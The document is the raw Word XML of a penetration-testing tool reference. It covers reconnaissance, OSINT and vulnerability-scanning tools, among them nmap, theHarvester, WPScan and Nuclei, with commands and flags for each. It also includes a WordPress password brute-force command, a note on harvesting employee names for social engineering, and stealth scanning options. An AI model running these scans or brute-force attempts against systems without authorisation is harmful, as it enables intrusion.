          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance and OSINT tools for collecting target intelligence before an engagement.</w:t>
      </w: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Nmap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Network Scanning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The industry-standard open-source network scanner used to discover hosts, services, and vulnerabilities across networks.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nmap &lt;target&gt;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Performs a basic TCP connect scan against the most common 1000 ports on the target host.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nmap 192.168.1.1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nmap -sS &lt;target&gt;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Sends SYN packets without completing the TCP handshake, making it faster and less likely to be logged than a full connect scan. Requires root/administrator privileges.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nmap -sS 192.168.1.1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nmap -sV &lt;target&gt;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Probes open ports to determine the service and version information running on each port.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nmap -sV 192.168.1.1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nmap -O &lt;target&gt;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Attempts to identify the operating system of the target by analyzing TCP/IP stack fingerprints. Requires root privileges.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nmap -O 192.168.1.1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nmap -A -T4 &lt;target&gt;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Enables OS detection, version detection, script scanning, and traceroute. -T4 speeds up the scan using a faster timing template.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nmap -A -T4 192.168.1.0/24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nmap -sC &lt;target&gt;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Runs the default set of NSE (Nmap Scripting Engine) scripts against the target, checking for common vulnerabilities and gathering extra information.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nmap -sC -sV 192.168.1.1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nmap -p &lt;ports&gt; &lt;target&gt;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Scans only the specified port(s) or port range instead of the default 1000 ports.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nmap -p 22,80,443,3306,8080 192.168.1.1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nmap -sn &lt;target-range&gt;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Performs host discovery only (no port scan), identifying which hosts are alive on a network. The legacy flag -sP is equivalent.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nmap -sn 192.168.1.0/24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-sS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TCP SYN (stealth) scan — never completes the handshake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-sV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Probe open ports to determine service/version info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-O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Enable OS detection via TCP/IP stack fingerprinting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-A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Aggressive scan: enables OS detection, version detection, script scanning, and traceroute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-T4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Timing template 4 (aggressive) — speeds up scan, suitable for fast networks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-sC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 default NSE scripts (equivalent to --script=default)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Specify ports or port ranges to scan (e.g. -p 80, -p 1-1024, -p-)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Skip host discovery (treat all hosts as online)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-oN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Output results in normal human-readable format to a file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-oX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Output results in XML format to a file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--script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 specific NSE script(s) by name or category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-sn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Ping scan — disable port scan, only discover live hosts (replaces deprecated -sP)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Discover all live hosts and open ports on a local or remote network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 running services and their software versions for patch management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Detect the operating system of remote hosts during penetration tests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Run NSE scripts to check for known CVEs and misconfigurations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Generate XML or grepable output for ingestion into vulnerability management platforms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Masscan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Network Scanning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The fastest Internet-scale port scanner, capable of scanning the entire IPv4 address space in under 6 minutes.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masscan -p1-65535 &lt;target&gt; --rate=10000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Scans all 65535 TCP ports on the target at 10,000 packets per second.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masscan -p1-65535 192.168.1.0/24 --rate=10000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masscan -p80,443 &lt;target&gt; --rate=1000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Scans specific ports with a conservative rate to avoid overwhelming the target or triggering IDS alerts.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masscan -p80,443 192.168.1.0/24 --rate=1000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masscan -p22,80,443 &lt;target&gt; --banners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Scans specified ports and attempts to grab banners from open services to identify software versions.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masscan -p22,80,443 192.168.1.1 --banners --source-ip 192.168.1.100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masscan -p1-1024 &lt;target&gt; --rate=5000 -oL output.txt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Scans the first 1024 ports and saves results in list format to a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masscan -p1-1024 192.168.1.0/24 --rate=5000 -oL masscan-results.txt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--rate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Set the transmit rate in packets per second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Specify port(s) or range to scan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--banners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Grab banners from open TCP services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--source-ip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Manually specify the source IP address for transmitted packets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-oL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Output results in list format to the specified file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Rapidly sweep large network ranges to identify live hosts and open ports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Pre-scan phase before a targeted Nmap scan to narrow down interesting hosts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Internet-wide research and scanning studies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Time-sensitive penetration tests requiring fast port discovery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theHarvester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OSINT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A passive OSINT tool for gathering emails, subdomains, hosts, employee names, open ports, and banners from public sources.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theHarvester -d &lt;domain&gt; -b google -l 100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Queries Google for up to 100 results related to the target domain, extracting emails and subdomains.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theHarvester -d target.com -b google -l 100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theHarvester -d &lt;domain&gt; -b bing -l 200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Uses Bing as the data source to discover emails and hosts associated with the target domain.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theHarvester -d target.com -b bing -l 200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theHarvester -d &lt;domain&gt; -b linkedin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Harvests employee names and associated data from LinkedIn for the specified company domain.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theHarvester -d target.com -b linkedin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theHarvester -d &lt;domain&gt; -b shodan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Uses the Shodan search engine as a data source to find hosts and open ports (requires a Shodan API key configured).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theHarvester -d target.com -b shodan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theHarvester -d &lt;domain&gt; -b all -l 500 -f results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Runs theHarvester against all available data sources and saves results to an HTML and XML report.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theHarvester -d target.com -b all -l 500 -f target-harvest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Target domain to search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-b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Data source (google, bing, linkedin, shodan, all, etc.)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Limit the number of results to retrieve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-f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Filename prefix for the HTML and XML output reports (no extension needed)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Email harvesting for phishing simulation campaigns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Subdomain and hostname discovery during the reconnaissance phase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Employee name enumeration via LinkedIn for social engineering assessments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Identifying internet-exposed infrastructure using Shodan integration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Building a target profile before active scanning begins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Recon-ng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OSINT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A full-featured web reconnaissance framework with a modular design similar to Metasploit, built for open-source intelligence gathering.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marketplace install &lt;module-path&gt;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Installs a specific module from the recon-ng module marketplace into the local framework.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marketplace install recon/domains-hosts/hackertarget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modules load &lt;module-path&gt;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Loads a previously installed module into the active session, ready for configuration.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modules load recon/domains-hosts/hackertarget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options set SOURCE &lt;domain&gt;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Sets the SOURCE option (target domain or value) for the currently loaded module.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options set SOURCE target.com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run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Executes the currently loaded and configured module, storing discovered data in the workspace database.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run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show hosts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Displays all hosts discovered and stored in the current recon-ng workspace database.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show hosts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Automated multi-source OSINT collection for penetration test reporting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Subdomain and host enumeration using public APIs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Building a structured intelligence database for a target organization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Correlating data from DNS, WHOIS, and social media sources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Chaining modules to progressively expand attack surface knowledge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Maltego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OSINT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A visual link analysis and OSINT platform that maps relationships between people, companies, domains, IPs, and other entities using automated transforms.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maltego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Opens the Maltego GUI. On first launch, you must register for a free Community Edition account to use public transforms.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maltego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GUI: Right-click domain entity -&gt; Run Transform -&gt; DNS to IP Address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Resolves a domain entity to its associated IP addresses using the built-in DNS transform.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Entity: target.com -&gt; Transform: Resolve to IP -&gt; Result: 93.184.216.34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GUI: Right-click Person entity -&gt; Run Transform -&gt; To Email Address [PiplAPI]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Attempts to find email addresses associated with a named person using people-search data sources.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Entity: John Smith -&gt; Transform: To Email Address -&gt; Result: john.smith@target.com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Visually map the infrastructure relationships of a target organization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Trace relationships between domain names, IPs, email addresses, and persons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 all subdomains and hosting providers associated with a company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Conduct social network analysis to find connections between individuals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Build a comprehensive OSINT graph for red team planning or threat intelligence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DMitry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OSINT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A UNIX/Linux command-line application for gathering as much information as possible about a host, including WHOIS, subdomains, email addresses, and open ports.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dmitry -w &lt;target&gt;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Performs a WHOIS lookup on the target domain to retrieve registration information.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dmitry -w target.com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dmitry -s &lt;target&gt;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Searches for subdomains of the target domain using various publicly available sources.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dmitry -s target.com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dmitry -e &lt;target&gt;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Attempts to enumerate email addresses associated with the target domain.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dmitry -e target.com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dmitry -winsepfb &lt;target&gt; -o output.txt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Runs all available modules: WHOIS, Netcraft, subdomains, emails, port scan, filtered/open ports, and banners. Saves the report to a text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dmitry -winsepfb target.com -o dmitry-report.txt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-w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Perform a WHOIS lookup on the target domain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Retrieve Netcraft.com information on the host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Search for possible subdomains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Search for possible email addresses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Perform a TCP port scan on the target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-o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Save output to a file (default: dmitry.txt)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Quick all-in-one passive information gathering on a domain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WHOIS and registration data collection for target profiling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Basic subdomain and email enumeration without API keys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Lightweight port scanning combined with OSINT in a single tool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DNSenum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DNS Enumeration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A multithreaded Perl script for enumerating DNS information about a domain, including zone transfers, subdomains, and MX/NS records.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dnsenum &lt;domain&gt;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Performs standard DNS enumeration: retrieves MX, NS, A records, and attempts zone transfer.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dnsenum target.com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dnsenum --file &lt;wordlist&gt; --threads 10 &lt;domain&gt;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Brute-forces subdomains using a wordlist file with 10 concurrent threads.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dnsenum --file /usr/share/wordlists/dnsenum/dns.txt --threads 10 target.com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dnsenum --enum &lt;domain&gt;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Performs a comprehensive enumeration including an attempted AXFR zone transfer against all discovered nameservers.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dnsenum --enum target.com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dnsenum --dnsserver &lt;ns&gt; --threads 20 --file &lt;wordlist&gt; &lt;domain&gt;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Directs all queries to a specific nameserver and runs a high-speed threaded subdomain brute force.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dnsenum --dnsserver 8.8.8.8 --threads 20 --file /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt target.com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--dnsserver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 a specific DNS server for all queries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--enum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Shortcut equivalent to --threads 5 -s 15 -w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--threads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Number of threads to use for brute-force subdomain lookups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--file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Read subdomains from a wordlist file for brute forcing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Number of Google search pages to scrape for subdomains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Maximum number of subdomains to scrape from Google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Discover all subdomains of a target domain using brute-force wordlists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Attempt DNS zone transfers to dump the full DNS zone file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Enumerate MX, NS, and A records for target infrastructure mapping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 IP ranges associated with a target for further scanning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DNSrecon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DNS Enumeration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A powerful Python-based DNS enumeration script supporting multiple record types, zone transfers, brute forcing, and reverse lookups.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dnsrecon -d &lt;domain&gt; -t std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Performs standard enumeration: SOA, NS, A, AAAA, MX, and SRV record lookups.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dnsrecon -d target.com -t std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dnsrecon -d &lt;domain&gt; -t axfr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Attempts an AXFR (full zone transfer) against all of the domain's nameservers.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dnsrecon -d target.com -t axfr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dnsrecon -d &lt;domain&gt; -t brt -D &lt;wordlist&gt;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Brute-forces subdomains using a provided dictionary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dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt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dnsrecon -r &lt;CIDR&gt; -n &lt;nameserver&gt;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Performs reverse PTR lookups on every IP in the specified CIDR range using the given nameserver.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dnsrecon -r 192.168.1.0/24 -n 192.168.1.1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Target domain name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Enumeration type (std, axfr, brt, rvl, goo, etc.)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Dictionary file for brute-force subdomain enumeration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-r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IP range for reverse DNS lookup (e.g. 192.168.1.0/24)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Specify a specific nameserver to use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Perform comprehensive DNS enumeration during reconnaissance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Attempt DNS zone transfers to extract full DNS zone data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Brute-force subdomains with custom or standard wordlists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Reverse DNS mapping of IP ranges to identify hostnames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Fierce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DNS Enumeration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A DNS reconnaissance tool focused on locating non-contiguous IP space and hostnames that are mapped to a target domain.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fierce --domain &lt;domain&gt;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Performs a basic DNS reconnaissance scan against the target domain, attempting zone transfers and common subdomain lookups.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fierce --domain target.com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fierce --domain &lt;domain&gt; --wordlist &lt;wordlist&gt;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Brute-forces subdomains of the target domain using the provided wordlist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fierce --domain target.com --wordlist /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt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fierce --domain &lt;domain&gt; --dns-servers &lt;dns-ip&gt; --connect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Runs the domain scan using a custom DNS resolver and attempts TCP connection to discovered hosts to verify they are accessible.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fierce --domain target.com --dns-servers 8.8.8.8 --connect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--domain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Target domain to scan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--wordlist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Path to a wordlist file for subdomain brute forcing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--dns-servers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Specify custom DNS server(s) to use for resolution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--connect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Attempt TCP connections to discovered hosts on common ports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--subdomains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Specify a list of subdomains to check instead of a wordlist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Discover subdomains that may reveal internal infrastructure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Locate non-contiguous IP blocks associated with an organization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Verify subdomain accessibility by attempting TCP connections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Supplement DNSenum and dnsrecon for comprehensive DNS coverage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Whois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OSINT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A command-line client for querying WHOIS databases to retrieve domain registration and IP ownership information.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whois &lt;domain&gt;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Queries the appropriate WHOIS server for registration information about the target domain.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whois target.com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whois &lt;ip-address&gt;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Queries the regional Internet registry (ARIN, RIPE, APNIC, etc.) for ownership and contact information for the given IP address.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whois 192.168.1.1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whois -h &lt;whois-server&gt; &lt;target&gt;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Directs the WHOIS query to a specific server, useful when the automatic server selection is incorrect.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whois -h whois.arin.net 8.8.8.8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Retrieve domain registrant and registrar information for target profiling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 the organization and contact details behind an IP address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Determine domain registration and expiry dates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Find abuse contact information for reporting or social engineering research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Subfinder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DNS Enumeration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A fast passive subdomain discovery tool that uses multiple data sources including certificate transparency logs, APIs, and search engines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Install: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="4"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f1f5f9" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1e293b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest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subfinder -d &lt;domain&gt;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Runs a passive subdomain discovery against the target domain using all configured sources.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subfinder -d target.com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subfinder -d &lt;domain&gt; -all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Queries every available passive data source, including those requiring API keys, for maximum coverage.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subfinder -d target.com -all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subfinder -d &lt;domain&gt; -o &lt;output-file&gt;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Writes all discovered subdomains to a specified output file, one per line.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subfinder -d target.com -o subdomains.txt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subfinder -d &lt;domain&gt; -silent | httpx -title -status-code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Runs in silent mode, printing only discovered subdomains to stdout, suitable for piping into tools like httpx.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subfinder -d target.com -silent | httpx -title -status-code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Target domain for subdomain discovery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-all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 all available enumeration sources (slower but more thorough)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-o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Write discovered subdomains to the specified output file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-silent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Suppress all output except discovered subdomains (useful for piping)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Passive subdomain enumeration without alerting the target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Building a comprehensive list of subdomains for further testing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Integrating into automated recon pipelines with other ProjectDiscovery tools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Certificate transparency log mining for subdomain discovery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Amass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DNS Enumeration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A comprehensive attack surface mapping tool from OWASP for in-depth DNS enumeration, subdomain discovery, and network mapping.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amass enum -passive -d &lt;domain&gt; -o &lt;output&gt;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Collects subdomains purely from passive data sources without sending any queries to the target's name servers.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amass enum -passive -d target.com -o amass-passive.txt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amass enum -active -d &lt;domain&gt; -ip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Performs active DNS resolution, zone transfer attempts, and certificate scraping for thorough subdomain discovery.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amass enum -active -d target.com -ip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amass intel -whois -d &lt;domain&gt;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Uses reverse WHOIS to discover other root domains registered by the same organization as the target.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amass intel -whois -d target.com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amass db -summary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Displays a summary of all data stored in the local Amass database for all enumeration sessions.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amass db -summary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-passive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 only passive data sources, no direct DNS queries to the target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-active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Include active DNS resolution and zone transfer attempts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Target domain (can be specified multiple times)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-o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Output discovered names and sources to a text file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-ip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 IP addresses in the results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-brute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Enable brute-force subdomain enumeration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-src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 the data source for each discovered name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Comprehensive attack surface mapping for large organizations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Discovering all subdomains and associated IP addresses of a target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Reverse WHOIS pivoting to find all domains owned by an organization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Tracking changes in an organization's external attack surface over time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Netdiscover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Network Scanning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An active/passive ARP reconnaissance tool for discovering live hosts on a local network segment.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netdiscover -p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Runs in passive mode, silently capturing ARP traffic to discover hosts without sending any packets.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netdiscover -p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netdiscover -i &lt;interface&gt;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Actively sends ARP requests on the specified interface to discover all live hosts on the connected network.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netdiscover -i eth0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netdiscover -r &lt;CIDR&gt; -i &lt;interface&gt;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Performs an active ARP scan on the specified IP range using the given network interface.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netdiscover -r 192.168.1.0/24 -i eth0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-r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Scan a specific IP range (e.g. 192.168.1.0/24)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-i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Specify the network interface to use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Enable passive mode — listen only, do not send ARP requests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Read a list of IP ranges from a file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Discover live hosts on a local network segment during a pentest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 hosts on wireless networks where ICMP is filtered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Map MAC addresses to IP addresses for asset inventory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Passively monitor ARP traffic to learn the network topology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ARP-Scan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Network Scanning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A fast and accurate ARP-based host discovery tool for identifying all active devices on a local network.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arp-scan --localnet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Automatically determines the local network range based on the active interface and scans all IPs in that range.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arp-scan --localnet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arp-scan -I &lt;interface&gt; &lt;CIDR&gt;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Sends ARP probes over the specified interface to every IP address in the given CIDR range.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arp-scan -I eth0 192.168.1.0/24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arp-scan &lt;target-ip&gt;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Sends an ARP request to a single IP address to confirm whether it is live and retrieve its MAC address.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arp-scan 192.168.1.1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Quickly enumerate all active hosts on a local network segment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 network devices by MAC address vendor (OUI lookup)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Detect rogue or unauthorized devices on a network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Complement nmap for reliable Layer 2 host discovery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Shodan CLI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OSINT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The command-line interface for Shodan, the search engine for Internet-connected devices, servers, and industrial systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Install: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="4"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f1f5f9" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1e293b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install shodan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shodan init &lt;API_KEY&gt;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Configures the Shodan CLI with your personal API key for authenticated queries.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shodan init aBcDeFgHiJkLmNoPqRsTuVwXyZ123456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shodan search "&lt;query&gt;"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Searches the Shodan database using a query string and returns matching hosts with their banner data.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shodan search "apache country:US port:8080"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shodan host &lt;ip-address&gt;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Retrieves all information Shodan has indexed for a specific IP address, including open ports, services, and CVEs.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shodan host 192.168.1.1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 Internet-facing services belonging to a target organization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Discover misconfigured or vulnerable devices exposed to the Internet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Research the attack surface of a target without sending any traffic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Find default-credential devices (routers, cameras, industrial systems)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanners and auditing tools to identify security weaknesses in systems and applications.</w:t>
      </w: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Nikto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Web Application Scanning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An open-source web server scanner that performs comprehensive tests against web servers for dangerous files, outdated software, and misconfigurations.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nikto -h &lt;host&gt;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Scans the target web server on the default HTTP port (80) for known vulnerabilities and misconfigurations.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nikto -h 192.168.1.10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nikto -h &lt;host&gt; -p &lt;port&gt;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Scans the web server running on a non-standard port.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nikto -h 192.168.1.10 -p 8080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nikto -h &lt;host&gt; -ssl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Forces the scanner to use HTTPS/SSL when connecting to the target web server.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nikto -h 192.168.1.10 -ssl -p 443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nikto -h &lt;host&gt; -o &lt;output-file&gt; -Format html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Scans the target and saves a formatted HTML report of all findings.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nikto -h 192.168.1.10 -o nikto-report.html -Format html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nikto -h &lt;host&gt; -Tuning 4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Runs only injection-related tests (XSS, SQL injection, etc.) using the Tuning parameter.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nikto -h 192.168.1.10 -Tuning 4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nikto -update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Downloads the latest plugin and vulnerability database updates from the Nikto project.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nikto -update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-h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Target hostname or IP address (required)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Specify target port(s), comma-separated or range (default: 80)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-ssl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Force SSL/HTTPS mode for the scan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-o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Write output to a file (format inferred from extension)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-Format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Specify output format: csv, html, msf+, nbe, txt, xml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-Plugins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Specify which plugins to run (default: ALL)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-Tuning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Tune scan type using codes: 1=interesting, 2=misconfiguration, 4=injection, etc.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-update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Update the plugin and database files to the latest versions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-useproxy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 the HTTP proxy defined in nikto.conf for all requests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Rapid identification of web server vulnerabilities and misconfigurations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Check for dangerous default files (phpinfo.php, test.cgi, etc.)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Verify HTTP headers and server security configurations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 outdated web server software with known CVEs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Generate vulnerability reports for web server assessments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WPScan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CMS Scanning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A black-box WordPress vulnerability scanner that enumerates users, plugins, themes, and checks for known CVEs in WordPress installations.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wpscan --url &lt;url&gt; -e u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Enumerates registered WordPress usernames, which can be used for password brute-force attacks.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wpscan --url http://192.168.1.10 -e u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wpscan --url &lt;url&gt; -e p --api-token &lt;token&gt;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Enumerates all installed plugins and checks them against the WPScan vulnerability database for known CVEs.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wpscan --url http://192.168.1.10 -e p --api-token YOUR_TOKEN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wpscan --url &lt;url&gt; -e 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Detects and enumerates active and inactive WordPress themes, including the version number.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wpscan --url http://192.168.1.10 -e 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wpscan --url &lt;url&gt; --passwords &lt;wordlist&gt; --usernames &lt;username&gt;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Attempts to brute-force the WordPress login for a known username using a password wordlist.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wpscan --url http://192.168.1.10 --passwords /usr/share/wordlists/rockyou.txt --usernames admin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wpscan --url &lt;url&gt; -e ap,at,u --api-token &lt;token&gt; --random-user-agent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Comprehensive scan enumerating all plugins, all themes, and all users while rotating User-Agent headers to reduce fingerprint visibility.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wpscan --url http://192.168.1.10 -e ap,at,u --api-token YOUR_TOKEN --random-user-agent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--url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Target WordPress installation URL (required)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Enumeration mode: u (users), p (plugins), t (themes), ap (all plugins), at (all themes)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--api-token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WPScan API token for vulnerability data lookup (from wpscan.com)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--passwords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Path to a wordlist for password brute forcing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--usernames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Specific username(s) to target for brute-force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--force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Do not check if the target is running WordPress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--random-user-agent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 a random User-Agent header for each request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 vulnerable WordPress plugins and themes with known CVEs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Enumerate WordPress usernames for credential attacks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Assess WordPress core version against known vulnerabilities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Brute-force weak WordPress admin passwords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Audit WordPress installations for security hardening recommendations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Lynis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Host Auditing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An open-source security auditing tool for Unix/Linux systems that performs in-depth system hardening assessments and compliance checks.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lynis audit system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Runs a complete security audit of the local system, checking all applicable categories and generating a hardening report.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lynis audit system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lynis audit system --pentest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Runs the audit in pentest mode, which does not require root privileges and simulates the view of a non-privileged attacker on the system.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lynis audit system --pentest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lynis show details &lt;test-id&gt;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Displays detailed information and remediation guidance for a specific test identified by its ID.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lynis show details AUTH-9328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cat /var/log/lynis-report.dat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Reads the machine-readable report file generated by the last Lynis audit run.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cat /var/log/lynis-report.dat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--pentest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Enable pentest mode — non-privileged scan simulating an attacker's perspective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--quick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Skip time-consuming tests for a faster audit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--report-file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Save the machine-readable report to a specific file path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--no-colors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Disable colored output (useful for logging to files)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--verbose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 more detailed output during the audit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Perform security baseline audits on Linux servers and workstations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 system misconfigurations and hardening opportunities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Assess compliance with CIS Benchmarks, PCI DSS, or HIPAA requirements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Run as a non-privileged user during pentest engagements for local privilege escalation insights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Nuclei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Vulnerability Scanning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A fast, template-based vulnerability scanner from ProjectDiscovery that uses community-contributed YAML templates to detect thousands of security issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Install: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="4"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f1f5f9" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1e293b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest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nuclei -u &lt;url&gt; -t &lt;template-path&gt;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Runs Nuclei against the target URL using templates from the specified directory or template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nuclei -u http://192.168.1.10 -t nuclei-templates/vulnerabilities/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nuclei -l &lt;targets-file&gt; -t &lt;template-path&gt; -o &lt;output&gt;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Reads a list of target URLs from a file and scans each one, writing findings to an output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nuclei -l targets.txt -t nuclei-templates/ -o nuclei-results.txt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nuclei -update-templates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Downloads and updates the community Nuclei templates repository to ensure access to the latest detection signatures.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nuclei -update-templates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nuclei -u &lt;url&gt; -severity critical,high -rate-limit 100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Scans only for critical and high severity issues while limiting the request rate to 100 per second.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nuclei -u http://192.168.1.10 -severity critical,high -rate-limit 100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Path to template file(s) or directory of templates to run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File containing a list of target URLs/IPs to scan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-u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Single target URL to scan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-rate-limit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Maximum number of requests per second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-severity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Filter templates by severity: info, low, medium, high, critical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-o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Write output findings to a file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-silent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 only found results, suppress informational output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-update-templates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Update the local Nuclei templates to the latest release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Automated vulnerability scanning across large numbers of web targets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Rapid CVE detection using up-to-date community templates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Integration into CI/CD pipelines for continuous security testing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Detecting misconfigurations in cloud infrastructure and web applications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OpenVAS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Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b91c1c"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="red"/>
          <w:highlightCs w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADVANCED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A comprehensive open-source vulnerability assessment system (part of the Greenbone Vulnerability Management suite) with over 100,000 vulnerability tests.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gvm-start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Starts all GVM/OpenVAS services including the OpenVAS scanner daemon, the GVM management daemon, and the Greenbone Security Assistant web interface.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gvm-start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openvas-setup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Performs the initial OpenVAS/GVM setup: creates the admin user, configures the database, and downloads the NVT, SCAP, and CERT vulnerability feeds.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openvas-setup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gvm-cli tls --hostname 127.0.0.1 --xml "&lt;create_task&gt;&lt;name&gt;Scan&lt;/name&gt;&lt;config id=\"daba56c8-73ec-11df-a475-002264764cea\"/&gt;&lt;target id=\"&lt;target-id&gt;\"/&gt;&lt;/create_task&gt;"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Uses gvm-cli to create and configure a scan task via the GVM TLS API. The config ID shown corresponds to the "Full and fast" scan configuration.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gvm-cli tls --hostname 127.0.0.1 --xml "&lt;get_tasks/&gt;"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gvm-cli tls --hostname 127.0.0.1 --xml "&lt;get_reports/&gt;"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Retrieves all available scan reports from the GVM management daemon in XML format.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gvm-cli tls --hostname 127.0.0.1 --xml "&lt;get_reports/&gt;"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Comprehensive authenticated vulnerability scanning of network infrastructure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Identifying missing patches and CVEs across Windows, Linux, and network devices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Compliance scanning against PCI DSS, HIPAA, and other regulatory frameworks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Generating executive and technical vulnerability reports for remediation tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
